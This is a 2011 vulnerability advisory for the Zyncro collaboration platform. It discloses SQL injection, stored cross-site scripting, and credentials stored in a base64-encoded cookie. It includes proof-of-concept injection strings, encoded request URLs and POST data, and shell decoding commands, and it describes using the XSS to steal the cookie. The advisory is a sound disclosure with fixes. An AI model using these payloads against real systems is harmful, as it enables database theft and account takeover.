Zyncro Cross Site Scripting / SQL Injection

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2011-003  
- Original release date: 13th September 2011  
- Last revised: 22nd September 2011  
- Discovered by: Ferran Pichel  
- Severity: 7.5/10 (CVSSv2 Base Scored)  
=============================================  
  
I. VULNERABILITIES  
-------------------------  
Multiple vulnerabilities in Zyncro social network.  
  
II. BACKGROUND  
-------------------------  
Zyncro is a platform designed for document collaboration, send, share  
& synchronize at an Enterprise-level. It is focused to make  
synchronization and sharing within a company easier.  
  
III. DESCRIPTION  
-------------------------  
This product has at least the next vulnerabilities:  
  
1.SQL Injection:  
SQL injection is a code injection technique that exploits a security  
vulnerability occurring in the database layer of an application (like  
queries). The vulnerability is present when user input is either  
incorrectly filtered for string literal escape characters embedded in  
SQL statements or user input is not strongly typed and thereby  
unexpectedly executed. It happens from using poorly designed query  
language interpreters.  
  
2.Persistent Cross-Site Scripting:  
The persistent (or stored) XSS vulnerability is a more devastating  
variant of a cross-site scripting flaw: it occurs when the data  
provided by the attacker is saved by the server, and then permanently  
displayed on "normal" pages returned to other users in the course of  
regular browsing, without proper HTML escaping.  
  
3.Credentials transferred using Cookie:  
Cookie data is commonly used to customize web applications, but  
sometimes some sensible data may be stored. In this case, it's  
possible to retrieve user_mail and password used to log into the  
application.  
  
IV. PROOF OF CONCEPT  
-------------------------  
1.SQL Injection:  
The vulnerable feature is located into the 'Message' menu, there are  
at least two vulnerable resources:  
/zwall/list/filter//appIdFilter//shareGroupUrnFilter/<B64_GROUP_REFERENCE>/shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809  
/ajax/getnewmessages/filter//appIdFilter//shareGroupUrnFilter/<B64_GROUP_REFERENCE>/shareGroupTypeFilter//shareDocumentUrnFilter//dateFilter/1315854782869?popup=1&plainView=1&rand=21107  
  
B64_GROUP_REFERENCE is a base64 string used to identify the group  
internally. Those references are like:  
c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nw==  
  
Once decoded:  
syncrum:sharegroup:32b32f9c-879a-44c4-9ef5-16d48a9aa167  
  
Those values are used internally to retrieve the messages related to a  
specified group. Modifying the final string and re-encoding it again  
to base64 it's possible to do an SQL Injection attack.  
  
For example, next sentence allows an attacker to read first 200  
messages from database:  
syncrum:sharegroup:32b32f9c-879a-44c4-9ef5-16d48a9aa167' or '1' like  
'1' limit 200 --  
  
Encoded:  
c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ==  
  
And finally the request:  
/zwall/list/filter//appIdFilter//shareGroupUrnFilter/c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ==/shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809  
  
2.Persistent Cross-Site Scripting:  
One of the functionalities of Zyncro is the possibility of creating  
groups. The name and description of the groups are not correctly  
sanitized and it's possible to provoke some attacks.  
  
In order to do the attack, you must create a new group and capture the  
packet transferred to the server to modify it because validation is  
done in client-side (only) using javascript.  
  
The original request has three POST data parameters like:  
popup=1 & name=dGVzdA%3D%3D & description=dGVzdA%3D%3D  
  
Important data are 'name' and 'description' parameters, which are  
base64 encoded. In this case, both values are 'test':  
url_decode(dGVzdA%3D%3D)  
b64decode(dGVzdA==)  
test  
  
It is possible to provoke the XSS by changing those values as follows:  
"><script>alert("XSS attack")</script>  
  
Values MUST be in base64, so:  
b64encode(""><script>alert("XSS attack")</script>") =  
Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4=  
  
Finally the post-data of the request would become:  
popup=1&name=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d&description=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d  
  
Once the request has reached the server, a new group would be created  
and any time that someone sees the name/description of the group, a  
pop-up would appear, this is the easiest attack.  
  
3.Credentials transferred using Cookie:  
When an user logins to Zyncro application a cookie named '_auth' is  
set. Its aspect is like:  
_auth=VmxaT1JsVnNPVVpVVlVaS1ZFUjNha2w2TlZGUlZrNVVWakE1VTFKRWQycEplalIz;  
  
If it's b64 decoded three times:  
fpichel@debian:~$ echo -n  
VmxaT1JsVnNPVVpVVlVaS1ZFUjNha2w2TlZGUlZrNVVWakE1VTFKRWQycEplalIz |  
base64 -d  
VlZORlVsOUZUVUZKVER3akl6NVFRVk5UVjA5U1JEd2pJejR3  
  
fpichel@debian:~$ echo -n  
VlZORlVsOUZUVUZKVER3akl6NVFRVk5UVjA5U1JEd2pJejR3 | base64 -d  
VVNFUl9FTUFJTDwjIz5QQVNTV09SRDwjIz4w  
  
fpichel@debian:~$ echo -n VVNFUl9FTUFJTDwjIz5QQVNTV09SRDwjIz4w | base64 -d  
USER_EMAIL<##>PASSWORD<##>0  
  
Finally it's possible to retrieve the username and password used to  
enter the application.  
  
V. BUSINESS IMPACT  
------------------------  
The business impact depends on the type of the exploitation of each  
vulnerability. The worst scenario is the exposure of all the data  
stored in database using a Blind SQL Injection based on SQL Injection  
vulnerability described. The explained PoC may be used to read  
arbitrary messages from the database, including private messages.  
  
Another critical scenario came from the use of the Persistent XSS in  
combination with the '_auth' cookie variable vulnerability to send the  
'_auth' cookie to a server controlled by the attacker. In this case,  
it would be possible for the attacker to retrieve credentials used by  
the user in plain text, data must be base64 decoded three times. After  
that, the attacker would be able to Log In into the application as the  
victim does.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
The vulnerability affect all Zyncro versions:  
- www.zyncro.com (primary Zyncro website)  
- my.zyncro.com (demo platform)  
  
VII. SOLUTION  
-------------------------  
In order to mitigate all the exposed problems next recommendations  
should be applied:  
- Sanitize all data sent by the user before and after decoding it to  
prevent SQL Injection attacks.  
- Sanitize all data sent to the user in order to prevent XSS attacks.  
- Change authentication design so not requiring the  
user_mail/password into Cookie data.  
  
Check all parts of the application that could be vulnerable to  
described issues.  
  
VIII. REFERENCES  
-------------------------  
http://www.zyncro.com  
http://www.isecauditors.com  
  
IX. CREDITS  
-------------------------  
These vulnerabilities have been discovered by  
Ferran Pichel Llaquet (fpichel (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
September 13, 2011: Initial release.  
September 22, 2011: Last revision.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
September 13, 2011: The vulnerability is discovered and sent  
to vendor.  
September 22, 2011: Vendor notifies all problems were already  
corrected. Sent to lists.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
  
XIII. ABOUT  
-------------------------  
Internet Security Auditors is a Spain based leader in web application  
testing, network security, penetration testing, security compliance  
implementation and assessing. Our clients include some of the largest  
companies in areas such as finance, telecommunications, insurance,  
ITC, etc. We are vendor independent provider with a deep expertise  
since 2001. Our efforts in R&D include vulnerability research, open  
security project collaboration and whitepapers, presentations and  
security events participation and promotion. For further information  
regarding our security services, contact us.  
`